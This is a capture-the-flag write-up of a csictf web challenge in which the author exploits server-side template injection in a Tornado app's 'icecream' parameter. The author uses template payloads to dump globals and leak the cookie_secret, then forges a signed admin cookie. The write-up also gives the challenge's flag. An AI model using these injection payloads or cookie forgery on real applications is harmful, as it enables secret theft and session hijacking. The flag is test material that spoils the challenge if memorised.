Web challenge http://chall.csivit.com:30279/ , we have a Tornado application vulnerable to server side template injection SSTI. First we need to leak the cookie_secret using ssti and regenrate a cookie with admin: true to get the flag.
- Gain general informations
- exploit the ssti parameter and leak the secret
- regenerate a tornado cookie
When we visit the website we got a page with a form to submit an ice-cream flavours:
the request look like http://chall.csivit.com:30279/?icecream={{chocolate}} it lead us to consider the possibility of an SSTI attack in icecream parameter.
first we tried this basic payload {{7*'7'}} :
this confirmed our thoughts of this website being vulnerable to ssti attack , next we tried to get the config by sending this url http://chall.csivit.com:30279/?icecream={{config}} but the server returned an exception :
from this exception we knew that the server used here was Tornado, which is an asynchronous python web server. Back to the documentation, we
noticed that tornado.web.Application use settings dictionary as a way to make application-specific settings like cookie_secret available to handlers without using global variables tornado settings
visiting http://chall.csivit.com:30279/?icecream={{globals()}} and we got :
we know that the name of the variable tornado.web.Application() is application so the final payload to get the secret was ?icecream={{application.settings["cookie_secret"]}} and we had the value MangoDB displayed on the website.
Signed cookies in tornado apps contain the encoded value of the cookie with a timestamp and an HMAC signature from github.
We regenerate the new cookie with required value true to get the flag csictf{h3r3_i_4m}, check out the forge_tornado.py.